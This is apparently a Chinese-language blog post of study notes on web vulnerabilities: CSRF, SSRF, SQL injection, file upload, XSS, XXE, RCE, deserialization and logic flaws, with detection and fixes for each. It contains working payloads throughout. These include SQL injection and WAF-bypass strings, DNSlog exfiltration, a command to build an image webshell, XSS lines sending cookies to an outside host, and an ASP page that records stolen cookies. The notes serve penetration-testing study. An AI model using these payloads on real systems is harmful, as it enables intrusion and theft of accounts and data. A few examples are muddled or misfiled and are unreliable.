web漏洞（CSRF-SSRF-文件包含-文件解释-文件下载-目录遍历-sql注入-文件上传-反序列化-XSS-XXE-RCE-逻辑越权）

本文链接：https://blog.csdn.net/weixin_46626737/article/details/129503195

1.CSRF（跨站请求伪造）（需要对方是在登录的情况下）--主要用于骗转账等等

原理：A在已经登录了银行的网站，并且此时去访问了B所构造的网页添加了特殊代码，A点击了B，由于A已经登录了，就造成了A直接向

B转账的情况

检测：

可以用bp抓包检测

看看有没有设置Token值

防御：

设置随机Token（数据包的唯一值，用于标识数据包）

设置Referer值，数据包来源（但是这个可以修改伪造Referer值进行绕过）

2.SSRF（服务器请求伪造）--主要用于资产探测，信息搜集等

目标：内网系统

原理：

简而言之，就是攻击者利用外网主机为跳板去访问其内网主机。

比如该站点可以上传文件（必须是远程上传），上传的文件是一个地址，上传这个地址后，服务器会主动访问这个地址，假如我们提

交的文件地址是一个恶意地址，比如服务器上的mysql端口地址，在提交端就会显示出来mysql的版本等等

容易出现漏洞的地方：

分享，转码服务，在线翻译，图片加载和下载，收藏功能，

攻击方式：

以远程上传文件为例：

http协议：http://10.1.3.2:3306 mysql

file协议：file：///D:/phpstudy/www/。。。。。

dict协议

ftp协议

3.目录遍历

就猜就完事，dirsearch，御剑等等

作用：多有点突破点，了解架构

4.文件读取

操作：../上一级目录

作用：可以窃取文件（一些配置文件-有数据库密码账户等等，以及一些后台等等）

问题：需要提前知道文件位置，可以使用路径扫描工具

或者知道CMS网站源码架构，就可以猜测基本文件架构

5.文件下载

需要可以传参的地方，例如：filename=‘a.php’可以修改其地址下载（必须网站源代码中有下载函数功能）

比如../../config.txt等等

下载其配置信息文件，进行下一步的使用。

判断方式：

通过看其函数和传递的参数情况来判断

6.命令/代码执行（RCE）：（一般需要白盒才可以发现）

Ⅰ.代码执行：（危害--执行脚本代码）

①脚本：比如写一个php文件，加一个get传过来的值x，函数eval（x），就可以脚本代码执行，比如输入X=phpinfo（），即可执行。

②产生：可控变量（x）和漏洞函数（eval()）

因为设计代码时候，加了某些函数，可以由访问者传入的函数，通过构造恶意代码，执行脚本代码。

③检测:白盒黑盒

④防御:

敏感数据禁用：例如php中禁用eval，assert函数，java中禁用exec函数等等

变量过滤或固定：

WAF产品

Ⅱ.命令执行：（危害--执行系统命令（例如cmd命令））

①系统：由于系统不同，linux和windows不同，对应的命令也不同，例如linux中是ls ，windows中是dir/s

②产生：可控变量（x）和漏洞函数（system()）

比如写一个php文件，加一个get传过来的值x，函数echo system（x），就可以脚本代码执行，比如输入Xsystem（x），就可以脚本

代码执行，比如输入X=phpinfo（），即可执行。

③检测：白盒黑盒

④防御：类似代码执行的防御方式。

7.XEE安全（xxe-labs)（实战较少）

Ⅰ.概念：

①XML：用于传输和存储数据的文件

②XEE：也叫XML文件外部实体注入漏洞，

③原理：网站接受xml数据提交，但是没有进行过滤

Ⅱ.危害：

①文件读取：最主要的作用

②RCE执行：需要php安装了expect扩展，可以执行命令

③内网探针

④DOS攻击

Ⅲ.检测：

①白盒：

函数及可控变量查找：

传输和存储数据格式类型：

②黑盒：

人工：

数据格式类型判断：

content-type值判断：text/xml application/xml

更改content-type值看返回（盲猜）：将原来的content-type值改为application/xml，再加入恶意payload，提交查看回显

工具：

利用bp抓包，发送到spider项目里进行爬行，会在历史请求中看到爬到的网页，看MIME type值中去查看是否有XML

XXEEinjector

Ⅳ.利用：

①输出形式：

有回显：

协议玩法：

http

file

各脚本支持协议

外部引用：

无回显：

外部引用-反向链接配合：相当于提交的payload，让服务器访问本机的地址，查看其对应的log日志文件，看是否有新的记

录，若有记录，就是有漏洞，即可进行接下来的恶意代码等等，若没有记录，则没有

②过滤绕过：

协议玩法：data:// file:// php://filter协议绕过

外部引用：可以通过将具体的命令放到文件中，XXE漏洞payload中加上这个文件的地址即可，可以用于绕过

编码UTF-16BE：对其对应的关键字进行编码，比如system，file等关键字

Ⅴ.修复：

①禁用外部实体引用

②过滤关键字：system，file

③WAF产品

8.sql注入（将sqllab全部拿下，基本就没问题了）⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐

原理：将设计好的参数传送到后端接收数据，发送到数据库，数据库执行语句，结果返回到前端显示

前提准备：

信息收集：数据库类型，数据库用户（登录数据库的用户名和密码），操作系统，数据库版本等等

基本思路：

①明确数据库类型，权限

②m明确提交方法，参数类型等

③明确数据库记录信息系统表

④依次库，表，列，值注入查询

⑤找后台，登录，获取webshell

⑥若是高权限，可以进行，文件读写，命令执行，注册表读取等等

Ⅰ.数据库类型

①mysql:

相关函数：

判断是什么类型数据库and (select count () from dual)>0**

注入例子：

爆数据库：id=-1 union select ‘null’, (select banner from sys.v_$version where rownum=1) from dual

爆表:id=-1 union select ‘null’, TABLE_NAME from USER_TABLES

爆列名：id=-1 union select ‘null’,(select column_name from user_tab_columns where rownum=1 and table_name=‘sns_users’) from dual

爆数据：id=-1 union select user_name,user_pwd from "sns_users"

⑧sybase（很少用到）

Ⅱ.提交方法(都可以根据其提交方法不同进行不同的注入方式)

①GET

②POST

③Cookie

④request：就是post和get都接受

⑤server：用来访问获取操作系统，用户IP，主机名，端口，服务等等

$_server['remote_host'],$_server['remote_addr']等等

⑥可以通过get注入，post注入，cookie注入，还有http请求头（X-Forward-for,User-Agent,等等字段）注入，具体根据其php代码接受的

参数是否拼接到sql查询语句中

Ⅲ.数据类型

①数据型

②字符型

③JOSN型（就是键值对，例如（"username"："qiaokai"））--手机APP中使用比较多

可以通过其进行注入，例如json={"username"："qiaokai' and 1=2 union select 1,database(),3"#}(其中#为注释符，还有--+)

Ⅳ.查询方式

①查询select：select * from admin

②插入insert:insert into admin(id,passwd) values(1,'123456')

③删除delete:delete from admin where id=1

④更新update:update set passwd='123123' where id=1

⑤排序order by:select：select * from admin order by id

⑥select,insert,delete,update注入基本思路都一样，只是回显和语法不同而已

Ⅴ.没有回显的情况-盲注

用于没有会显的情况下，得到数据的方式

结合ord=ACSII，length（），subtrac(),mid(),left()等函数去猜测是哪个字符进行注入

①基于布尔的盲注-逻辑判断

利用上面的一些函数，如果正确，就正常显示，若不正确就报错

id=1 and left(version(),2)='5.'

②基于时间的盲注-延时判断

sleep():通过执行时间来判断是否被执行

id=1’ and if ((ascii(substr(database(),0,1))>100),sleep(10),1) --+

benchmark(count,expr)：

可测试某些特定操作的执行速度。count指的是执行次数，expr表达式，表示重复计算表达式count次，评估执行表达式的

效率。

③基于报错的盲注-报错回显

floor:()

通过使用count()、floor()、rand()、groupby四个条件形成主键重复的错误floor(a)取整函数，返回小于等于a，且值最接近a

的一个整数floor(x)：对参数x向下取整，比如floor(0.2)=0，floor(3.6)=3。rand( )：生成一个0~1之间的随机浮点数,count(*)：统计某个表下总共有多少条记录。group by x：按照（by）一定的规则（x）进行分组。

' union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from

information_schema.columns group by a--+

updatexml:updatexml():

函数用来更新选定XML片段的内容,将XML标记的给定片段的单个部分替换为新的XML片段 ,然后返回更改的XML。updatexml函数的使用形式为updatexml(XML_document,XPath_string,new_value)XML_document是String格式，为XML文档对象的名称。XPath_string，XPath格式的字符串(如果XPath_string不是XPath格式,则会报错并显示出XPath_string的值) 我们就是通过这个参数让数据库报错，继而得到我们需要的数据。new_value，String格式，替换查找到的符合条件的数据。

select updatexml(1,concat(0x7e,user(),0x7e),1);

extractvalue:extractvalue():

函数与updatexml()函数类似,

select extractvalue(1,concat(0x7e,user(),0x7e));

④基于排序的盲注

Ⅵ.注入拓展

①相关数据库函数：

路径获取常见函数：报错显示，遗留文件，漏洞报错（爆路径漏洞），平台配置文件，爆破等

②跨库：

获得其他数据库名的操作：id=-1 union select 1,group_concat(schema_name) ,2,3,4,5 from information_schema.schemata前提是WWW文件下多个网站，当sql注入获得一个网站的数据库root权限后，可以利用其root权限对其他数据库进行操作，也就是对其他网站的数据库进行操作(利用information_schema中的schemata表记录所有数据库名)

③注释语句：

--+

④加解密：

就是普通的对数据进行加解密算法

⑤二次注入：（绕过转义注入（'->/'），利用的是插入insert时转义，后来数据库自己调用update时不会转义）

先构造恶意语句注入到数据库中，然后再当其数据库执行语句时，又用到了该插入的恶意语句

比如：注册账号，注册的用户名或者密码插入一些恶意语句，然后修改密码，或者修改用户名，数据库就会用到之前插入的恶

意语句（insert into user (username,pwd) values ('qiao' union select database(),2#','123456') 然后修改密码 update set

pwd='123456' from user where username='qiao' union select database(),2#'），完成二次注入

⑥dnslog带外注入：（也可以使用DnslogSql工具进行注入）

前提：需要注入点是高权限（文件读写）

原理：就是盲注时不回显示，通过特殊构造的语句和知道创宇公司的网站平台联合使用，将不回显的查询结果放到这个网站

中，在正常网页中无法看到注入结果，但在该网站中可以显示结果，也就形成了所谓的带外。

好处：解决了盲注不回显，效率低的问题

例子：id=1 and if ((select load_file(concat('\\\\',(select

version()),'.知道创宇网站中分配的identifier值\\abc')))1,0)--+

⑦中转注入：

原理：将目标地址放到脚本文件中，用sqlmap工具去访问127.0.0.1：8080/这个脚本文件进行注入，可以在该脚本文件中加入一

些加密解密，拼接的操作，从而达到一个中转的目的。

⑧堆叠查询：

原理：多条语句同时注入，同时执行，也就是所谓的堆叠

例子：在数据库中：

select * from admin;select * from user;可以一条命令行，同时执行

在实际注入中：

id=1';select *from admin--+

⑨IP白名单：

可以尝试使用修改数据包头来改地址，X-Forward-For，X-remote-IP/addr等等

⑩静态资源绕过方式：（主要是文件类型不同）

可以在其地址后加一个其他路径文件来注入，可以进行绕过

例子：

要对127.0.0.1:8080/index.php?id=1进行注入，可以对其127.0.0.1:8080/index.php/123.txt?id=1进行注入，WAF可能进行放行

11.url白名单：（主要是php/asp文件不同）

可以在其地址后加一个其他路径文件来注入，可以进行绕过

例子：

要对127.0.0.1:8080/index.php?id=1进行注入，可以对其127.0.0.1:8080/index.php/123.php?id=1进行注入，如果添加了该路

径的白名单，则WAF会进行放行

12.爬虫白名单：

WAF通过识别User-Agent来进行检测是否是爬虫，若被检测，会被短暂封禁IP

可以通过伪造其User-Agent来伪装成正常的搜索引擎访问，从而不被拦截

Ⅶ.防御方案及其对应的WAF绕过

①魔术引导：

magic_quotes_gpc.php文件功能打开或者使用：会对四种符号’ “ / \ 进行转义

绕过方式：

编码：16进制

宽字节：

②内置函数：

addslashes函数（过滤‘ ” / \）

is_int()/char()/integer()/long()函数(用来判断是否是对应类型的数据)

目前无法绕过

③关键字过滤：

函数str_replace('关键字 select/union/放个字典等等''想要替换成的字符'，$id);

绕过方式：

利用大小写绕过：SeLeCt

④WAF防护软件及其对应的绕过：

安全狗：

宝塔

阿里云盾

Ⅸ.一些其他的绕过方式(一般都得多种绕过方法组合起来使用才有可能实现绕过)

①更改提交方法

有的情况下设置WAF只有对GET提交的数据进行检测，此时就可以通过改成POST提交就可以绕过

②大小写混合

SeLeCt UnIoN

③解密编码类

%0a-换行符 %20-空格 %23-#

④注释符混用

不一定非要放在句末，也可以放在句中

database/**/()--+

⑤等价函数替代

⑥特殊符号混用

⑦借助数据库特性

mysql：

利用注释符时： /*select *from user*/ 该语句执行为空语句，但/*!select *from user*/ 加个叹号即可正常执行

特殊注释符：/*!50001 select *from admin*/该语句的意思是如果数据库的版本在5.00.01以上，则会执行以上语句

⑧HTTP参数污染

原理：若是php+apache 传递的多个参数取last 假设x=1&x=3 传递到后端就是x=3

若是jsp+tomcat 传递的多个参数取first假设x=1&x=3 传递到后端就是x=1

若是cgi+apache 传递的多个参数取first以此类推

若是python+apache 传递的多个参数取all以此类推

若是asp+iis 传递的多个参数取all以此类推

例子：

id=1/*&id=-1 union select 1,database(),3 #*/ 传给waf，waf匹配到的只有id=1，传给后端数据库因为参数污染，得到的是

id=-1 union select 1,database(),3 #*/ -> id=-1 union select 1,database(),3

⑨垃圾数据溢出

⑩重写

11.Fuzz大法（模糊测试）

也可以理解成为暴力测试

例子：

id=1 union%23 select 1,2,3 用bp抓包，用字典去大量修改%23，%24，%25等等，一次次的暴力测试。

Ⅹ.相关工具

①sqlmap（sql注入神器）

有一个temper脚本库（插件库）：

特别好用，可以进行适当的修改来进行自己的操作

利用其代理：

--proxy指向本地，利用bp抓包，查看是哪里的错

WAF会对工具进行拦截：

用这个对其绕过--random-agent

还有流量拦截：

可以在其脚本文件中修改User-Agent头参数，修改成其他引擎参数

也可以用命令--user-agent来修改

还有延时注入：

防止请求过于频繁，被封禁IP，命令--delay等

多学习，学透sqlmap

②NoSQLAttack

③DnslogSql

9.文件上传（获得shell权限）

把upload-labs通关即可(github上有)

思路：

先找上传点->看看有没有解析漏洞iis那些->利用黑明白白名单绕过尝试->还不行，就找有没有CMS,CVE的文件上传漏洞。

Ⅰ.基本介绍

①原理：上传webshell后门，用工具连接

②危害：高危，直接获取到权限

③如何查找和判断：可以提交上传文件的地方

④需要注意的地方：上传成功之后有一个十分重要的点，必须得知道其后门路径

不知道路径的情况下：可以通过其CMS框架结构，来判断猜测上传的文件路径在哪里

若知道了CMS，可以利用其CMS框架漏洞来尝试

Ⅱ.前端验证：抓包修改文件名即可。

后端：

黑名单：asp,php,jsp,aspx,cgi,war等文件类型不让上传

绕过方式：因为apache可以php解析后缀为php3,php5,phtml类型的文件

还可以修改http头content-type字段的值

白名单：jpg,png,zip,rar,gif等文件类型让上传

其他类型绕过：（一般都需要诸多绕过方式联合起来使用）

文件解析漏洞：

.htaccess文件（只有apache可以用）

大小写绕过：

.pHp文件后缀

空格绕过：

.php空格（原因是没有进行收尾去空格，在后端检测时候，会检测成为.php空格，但黑名单中没有，就会放行，进入windows

后，windows会默认把空格去掉，就变成为.php文件。利用了系统的特性，但linux不会默认去除空格，所以在linux中无法

利用这种方法）

点绕过：

.php.（原因是没有进行去点检测，在后端检测时候，会检测成为.php.，但黑名单中没有，就会放行，进入windows后，windows

会默认把.去掉，就变成为.php文件。利用了系统的特性）

重写绕过：

.phphpp，系统后端过滤一次（代码写的时候不是循环，只过滤一次）就成了.php

::$DATA绕过：

%00截断=空格：（地址方面）

抓包修改路径提交保存的路径为：./upload/3.php%00,get（不需要对%00编码，原因是get提交方式会自动解码）或者post（需

要对%00编码，post提交方式不会自动解码）方式提交，后端得到的是3.php%00，还会在其后随机加上文件名和提交文件的

后缀，比如最后的结果是3.php%001321231.jpg,放到windows下，3.php 1321231.jpg直接默认变成3.php

0x00截断（文件命名方面）0x0a截断都是类型，只是代表的字符不同。

图片马生成命令：

copy 1.jpg /b +shell.php /a webshell.jpg

二次渲染：

是指两次上传，先选择文件，还需要点保存，比如学习通上传文件，普通的就一次，选择好照片就上传了。

但会有两种情况，一种是先上传上去，再验证是否删除

另一种是先验证，再上传。

第一种可以利用条件竞争，DDOS上传法，一直上传，一直访问，会出现，一直连接，一旦成功，文件会被占用，也就无法被

删除。第二种则没办法。

仿制文件夹方式：（适用于黑名单）

提交文件名为：123.php/.

数组绕过：（很难猜到，黑盒几乎破解不了）需要代码中有数组验证。

Fuzz大法（模糊测试）:

GitHub上有字典，下载下来，用bp跑，一直爆破，看怎么可以绕过。

Ⅲ.漏洞/修复

①解析漏洞

在nighx下，可以用：

例子：www/123.jpg是上传的图片马，将地址改为www/123.jpg/123.php即可以执行php代码，若上传的文件名被修改，可以结合

爆破工具来尝试找

在IIS6.0下：（上传的jpg格式的文件以前者格式解析）

有文件夹绕过：这样命名123.php/123.jpg

文件绕过：这样命名123.php;123.jpg

在apache低版本中：

有未知后缀名解析漏洞，例如123.php是以php格式解析，但123.php.xxx也是以php解析，就是比如后面的后缀名不能解析

，就往前解析。

②CMS漏洞

例如：通达OA系统的文件上传漏洞

也是明白了系统版本，框架版本，网上找漏洞。

③其他漏洞

各种web编辑器的漏洞：(编辑器-是指传过来的文件，音频等进行编辑解码等等操作--最常见的就是学习通里交作业那个也是编

辑器)使用前提得知道编辑器的版本，和路径

fckeditor编辑器:知道版本号，直接利用网上的漏洞即可。

ueditor编辑器，ckeditrot编辑器，kindeditor编辑器等等

Ⅳ.WAF绕过

①safedog

数据溢出：比如-原来是abc.php，在字段中;；之间加垃圾数据；

例子：在content-disposition字段中；from-data;abcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlk

zxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzx

cnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcn

zabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnza

bcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnzabcasdlkzxcnz；name="upload",filename="a.php"

符号变异：比如正常数据包传输中：filename="123.php",可以修改成filename="123.php 或filename="123.php；实现绕过

数据截断：和上面差不多

重复数据：

例如：filename='1.jpg';filename='2.jpg';filename='3.jpg';filename='4.jpg';filename='5.jpg';filename='6.jpg';file

name='7.jpg';filename='8.jpg';filename='9.jpg';filename='1.php'

②宝塔

③云盾

10.XSS（github上有一个XSSlabs闯关游戏）--主要用于盗取cookie，用户保存的账号密码等等

Ⅰ.原理：

传参，get方式 x=<script>alert('123')</script>还有post只是提交方式不同

有时候前端会有字数拦截，可以抓包修改

只要提交数据，前端有回显即可尝试XSS

主要可能触发的地方：留言板，评论区，站内搜索等等--主要是简单的反射型；若你提交的XSS语句，会有人点击查看触发，那就形

成了交互，这个危害就大了--可以利用beef等来进行控制

Ⅱ.分类：

①反射型：

发送的参数，发送到后端代码（后端的php），后端代码执行回应，单次的交互

②存储型：

存储在后端数据库某个表里，会多次交互，每次刷新都会弹窗

③DOM型：

发送的参数，在浏览器里代码（前端的js）解析，并且回应

Ⅲ.手法：

①XSS平台使用：利用相关平台，用来接收其他人点击所触发xss后传输的数据

xss platform

②XSS工具:

beef（XSS神器）

xsstrike

Ⅳ.绕过：

①代码绕过：

②http only：（仅仅阻止获取cookie）

在php.ini文件中的session.cookie_httponly=1/TRUE,（也可以在php代码中进行设置）设置了这个选项,获得到的cookie值为空

绕过方式：在phpinfo页面中会显示，想办法让对方访问这个页面，通过XSS平台来获取源码，盗取到session；

若登录者有习惯在网页上进行保存密码，可以利用XSS平台的获取保存的密码进行获取账号密码；

若登录者在网页上没有进行保存密码，需要XSS产生在登录框界面，利用表单劫持。

③WAF绕过：

<>实体化绕过：

<变成&lt，>变成&gt；，可以利用<onclick、<a hera、<src、<data标签的使用进行绕过执行JavaScript绕过

结合大小写，重写，编码绕过

标签语法替换：

例如:<src=> <onclick> <data>等等

特殊符号干扰：

例如：# @ --+ / ！等等

提交方式更改：

get换post，put等等

垃圾数据溢出：

/asdadnkzc!dlknasdlczx.......

加密解密算法：

加解密

XSS结合其他漏洞

Ⅴ.修复：（安全修复方案）

开启http-only,进行输入检测，输出检测等

Ⅵ.危害：

比如，QQ空间里说说有XSS漏洞，我写一篇XSS代码（盗取cookie）发说说，然后诱使别人来点击我的说说，访问我的说

说的人的cookie就会发送到我这里。

若是反射型，可以盗取cookie，然后利用其cookie来绕过登录

Ⅶ.相关命令：

①窃取token <p><img src="https://attacker/?data=</p> <p>This is a secret text.</p> <p id="x">AAA</p>

②http(s)∶创建一个链接 <a href=https://attacker/>Session expired. Please login again.</a>

③加载相对 url 脚本 <div><base href=//cors.l0.cm/</div> <script src=/test.js></script>

④获取cookie：只能用于不限制弹窗的情况：<script>window.open('" target="_blank">http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script>

接受cookie的页面代码：

<html>

<body>

testfile = Server.MapPath("code.txt") //先构造一个路径，也就是取网站根目录，创造一个在根目录下的code.txt路径，保存在testfile中

msg = Request("msg") //获取提交过来的msg变量，也就是cookie值

set fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象

set thisfile = fs.OpenTextFile(testfile,8,True,0)

thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie

thisfile.close //关闭

set fs = nothing

</body>

</html>

Ⅷ.其他知识：

cookie：存在本地，存活时间较长，一般是小中型网站，比如登录上网站，一般不退出就不需要重新登录

session:会话，存在服务器，存活时间较短，就比如登录上网站，过个几分钟就需要重新登录（更加安全）（常见的是会话劫持）

若网站采取session验证：则需要cookie和session同时提交登录--目前大多数都是session验证

webshell箱子：

就是自己写一个马，让别人去攻击，结果传到自己这里，他们攻击成功的数据就返回到了自己这里；还可以利用其webshell箱

子进行跨站漏洞，获取cookie，然后利用postman进行登录，它的webshell箱子就是自己的了。

判断网上下载的木马有没有木马，通过本地执行，看有没有发送到其他地址的包。

XSSLABS:

前端闭合

鼠标点击'οnclick='javascript:alert(1)'---htmlspecialchars函数对<>进行实体化

"οnmοuseοver="alert(123)

大小写绕过

重写绕过

转码：c->c

<---%3c >---%3d

11.文件包含-将文件以脚本执行

原理：例如有一个123.php文件中声明了包含include(123.txt),txt文件中写的是phpinfo（），直接访问123.php?x=123.txt,txt文件中的ph

pinfo函数会以php格式去解析。

Ⅰ.脚本：asp,aspx,php,jsp等等

Ⅱ.检测：黑盒：

白盒：

Ⅲ.类型：

分为有限制和无限制：

无限制是对包含的文件没有限制；

有限制就是对包含的文件有检测：可以通过00截断，或者可以使用./././././././././././../././././././././././././......超

过256位进行垃圾数据溢出绕过，或者是...............绕过也可以 00截断需要php版本在5.3.0以下

本地包含：比如：http://192.168.1.3/123.php?x=123.txt

远程包含：比如http://192.168.1.3/123.php?x=http://192.168.66.1/123.txt

Ⅳ.利用：

各种伪协议的结合使用

Ⅴ.修复：固定后缀，固定文件，WAF产品。

12.反序列化

PHP：（==验证值，===验证值和类型）

Ⅰ.原理：序列化就是将对象转换成字符串，反序列化就反过来，没有对反序列化的字符串进行检测，提交的字符串触发了其他的魔术

方法。

O/i:对象长度：“对象名称”：对象个数：{变量类型（s/i）：变量名长度：“变量名”；值类型（s/i）：值长度：“值”；。。。。。。}

函数-unserialize将字符串转换成对象

Ⅱ.技术：

①有类-触发魔术方法：看看有没有class，

魔术方法：__construct():在new一个对象的时候首先调用的函数，一般用于初始化。

__destruct():一个对象被销毁的是时候自动调用。

__get($p):访问的属性不存在或者权限不允许（protected和private）时调用,其中$p为值。

__set($p1,$p2):访问的属性不存在或者权限不允许（protected和private）时调用,其中$p1为参数,$p2为值。例如:$obj->

p1 = 'p2';

__call($p1,$p2):与__set()和__get()类似，当访问的函数不存在或者权限不允许（protected和private）时调用,其中$p1

为函数名,$p2为参数名。例如:$obj->p1("p2") ;

__invoke():当对象被当作函数时会调用。例如$obj();

__toString():当对象被echo等当成string时会调用。例如echo $obj;

__sleep():当使用序列化函数serialize()之前调用。

__wakeup():当使用反序列化函数unserialize()之前调用

②无类：例s:5:"qiao1",s是字符，i是数值

Ⅲ.利用：

①真实应用o::"abc":1:{s:2:"op":" 2"}

②CTF

Ⅳ.危害：

①sql注入

②代码执行

③目录遍历

JAVA：（工具生成payload--ysoserial工具）

Ⅰ.概念：原理与php序列化类似，只是序列化的函数不同，Java中的序列化函数是ObjectOutputStream类的wirteObject（）函数，反序列化

就是ObjectInputStream类的readObject（）函数与php反序列化不同的是，php主要是因为魔术方法，而Java反序列化主要是因

为在传送过来的恶意数据没有进行检测，然后进行反序列化解密执行达到了执行恶意命令的情况。

若看到是以rO0AB开头的字符串，就是序列化后并进行base64加密的序列化字符串。

若看到是以aced开头的字符串，就是序列化后的16进制的序列化字符串。

Ⅱ.利用：

①payload生成器：

②自动检测工具或脚本：

Ⅲ.检测：

①黑盒：主要根据响应包中查看是否有对应格式的数据

②白盒：代码审计

Ⅳ.修复

13.逻辑安全（src漏洞中比较多）

Ⅰ.越权（不同于未授权访问）

①水平越权：是指用户A越权到用户B（同级的）

②垂直越权：是指普通用户越权到管理员等等（不同级的）--（更加重要，可以利用垂直越权，来提升权限，从而拿下web网站）

Ⅱ.登录：

①暴力破解：若传输的数据被加密了，若知道了其加密方式，可以利用爆破，加密后的密码本，或者bp里的payload加密功能

②本地加密传输

③cookie脆弱：通过修改返回包中的cookie值（一般只是白盒代码审计发现才有用）

④session劫持

⑤密文对比认证

⑥修改参数值：比如id参数，密码参数，返回结果0还是1，购买平台修改购买物品信息，数量，支付成功与否和支付价格，订单编号

等等

Ⅲ.工具：小米范，bp自带的有

Ⅳ.修复方案：

①前后端同时验证

②检查对方是否有相应的权限

③加密传输数据

④严格过滤和审查

⑤token，session验证：token主要是用于防止重放攻击的，session和cookie类似，只是前者在服务端，后者在客户端存储，token和ses

sion都存放在cookie中

Ⅴ.验证码破解：

①暴力破解：bp抓取爆破就行

②自动识别：fuzz工具，bp自带的插件有

③有没有验证码复用问题：同一标识的数据包可以提交多次

Ⅵ.找回

①客户端回显：点击得验证码，在抓相应包中会显示验证码。

②Response状态值：更改回应包，修改回应值（只有在前端验证结果情况下才可以）--单纯欺骗前端检测。

③session覆盖

④弱token缺陷：有时候提交一个假的token，会在响应包中显示真实的token

⑤找回流程绕过

Ⅶ.接口

①调用遍历

②参数篡改

③未授权访问

④webservice测试

⑤calback自定义